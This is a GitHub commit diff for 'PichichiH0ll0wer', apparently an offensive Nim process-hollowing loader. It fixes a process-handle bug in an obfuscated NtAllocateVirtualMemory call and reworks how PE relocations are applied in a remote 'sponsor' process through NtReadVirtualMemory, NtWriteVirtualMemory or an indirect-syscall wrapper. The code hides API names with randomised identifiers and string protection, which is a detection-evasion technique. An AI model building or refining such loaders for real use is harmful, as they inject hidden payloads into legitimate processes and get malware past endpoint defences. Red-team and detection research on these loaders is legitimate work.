fixed bug in relocations

itaymigdal · Feb 16, 2024 · dc1a55e · dc1a55e
1 parent b1becd5
commit dc1a55e
Show file tree

Hide file tree

Showing 2 changed files with 24 additions and 26 deletions.
diff --git a/PichichiH0ll0wer/Loader/hollow123.nim b/PichichiH0ll0wer/Loader/hollow123.nim
@@ -139,7 +139,7 @@ proc hollow123*(peStr: string, processInfoAddress: PPROCESS_INFORMATION): bool =
         when not defined(release): echo "[*] Allocating memory in sponsor process (preferred address)"   
         var newImageBaseAddress = peImageImageBase
         res = CbZGEMmsvlfsZxPo( # NtAllocateVirtualMemory
-            1, # sponsorProcessHandle,
+            sponsorProcessHandle,
             addr newImageBaseAddress,
             0,
             addr peImageSize,

diff --git a/PichichiH0ll0wer/Loader/reloc.nim b/PichichiH0ll0wer/Loader/reloc.nim
@@ -14,9 +14,10 @@ type BASE_RELOCATION_BLOCK {.bycopy.} = object
 type PBASE_RELOCATION_ENTRY = ptr BASE_RELOCATION_ENTRY
 type PBASE_RELOCATION_BLOCK = ptr BASE_RELOCATION_BLOCK
 
+proc NtReadVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToRead: SIZE_T, NumberOfBytesReaded: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.}
+
 when defined(hollow1) or defined(hollow4):
     proc NtWriteVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToWrite: SIZE_T, NumberOfBytesWritten: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.}
-    proc NtReadVirtualMemory(ProcessHandle: HANDLE, BaseAddress: PVOID, Buffer: PVOID, NumberOfBytesToRead: SIZE_T, NumberOfBytesReaded: PSIZE_T): NTSTATUS {.stdcall, dynlib: protectString("ntdll"), importc.}
 when defined(hollow2) or defined(hollow5):
     include syscalls2
 when defined(hollow3) or defined(hollow6):
@@ -28,10 +29,8 @@ proc applyRelocations*(peBytesPtr: ptr byte, newImageBaseAddress: LPVOID, sponso
     var peImageSectionsHeader = cast[ptr IMAGE_SECTION_HEADER](cast[size_t](peImageNtHeaders) + sizeof(IMAGE_NT_HEADERS))
     var peImageImageBase = cast[LPVOID](peImageNtHeaders.OptionalHeader.ImageBase)
     var dwDelta = cast[DWORD](cast[int](newImageBaseAddress) - cast[int](peImageImageBase)) 
-
     if dwDelta == 0:
         return true
-
     for i in countUp(0, cast[int](peImageNtHeaders.FileHeader.NumberOfSections)):
         if toString(peImageSectionsHeader[i].Name) == protectString(".reloc"):
             var dwRelocAddr = peImageSectionsHeader[i].PointerToRawData
@@ -48,32 +47,31 @@ proc applyRelocations*(peBytesPtr: ptr byte, newImageBaseAddress: LPVOID, sponso
                         continue
                     var dwFieldAddress = pBlockheader.PageAddress + cast[DWORD](pBlocks[j].Offset)
                     var dwBuffer: DWORD = 0
+                    if NtReadVirtualMemory(
+                        sponsorProcessHandle, 
+                        cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress), 
+                        addr dwBuffer,
+                        cast[SIZE_T](sizeof(DWORD)),
+                        NULL
+                    ) != TRUE:
+                        return false
+                    dwBuffer += dwDelta
                     when defined(hollow1) or defined(hollow4):
-                        if NtReadVirtualMemory(
-                            sponsorProcessHandle, 
-                            cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress), 
+                        if NtWriteVirtualMemory(
+                            sponsorProcessHandle,
+                            cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
+                            addr dwBuffer,
+                            cast[SIZE_T](sizeof(DWORD)),
+                            NULL
+                        ) != TRUE:
+                            return false
+                    when defined(hollow2) or defined(hollow3) or defined(hollow5) or defined(hollow6):
+                        if nVcnEsSyWXtfrjav(
+                            sponsorProcessHandle,
+                            cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
                             addr dwBuffer,
                             cast[SIZE_T](sizeof(DWORD)),
                             NULL
                         ) != TRUE:
                             return false
-                        dwBuffer += dwDelta
-                        when defined(hollow1) or defined(hollow4):
-                            if NtWriteVirtualMemory(
-                                sponsorProcessHandle,
-                                cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
-                                addr dwBuffer,
-                                cast[SIZE_T](sizeof(DWORD)),
-                                NULL
-                            ) != TRUE:
-                                return false
-                        when defined(hollow2) or defined(hollow3) or defined(hollow5) or defined(hollow6):
-                            if nVcnEsSyWXtfrjav(
-                                sponsorProcessHandle,
-                                cast[PVOID](cast[DWORD](newImageBaseAddress) + dwFieldAddress),
-                                addr dwBuffer,
-                                cast[SIZE_T](sizeof(DWORD)),
-                                NULL
-                            ) != TRUE:
-                                return false
     return true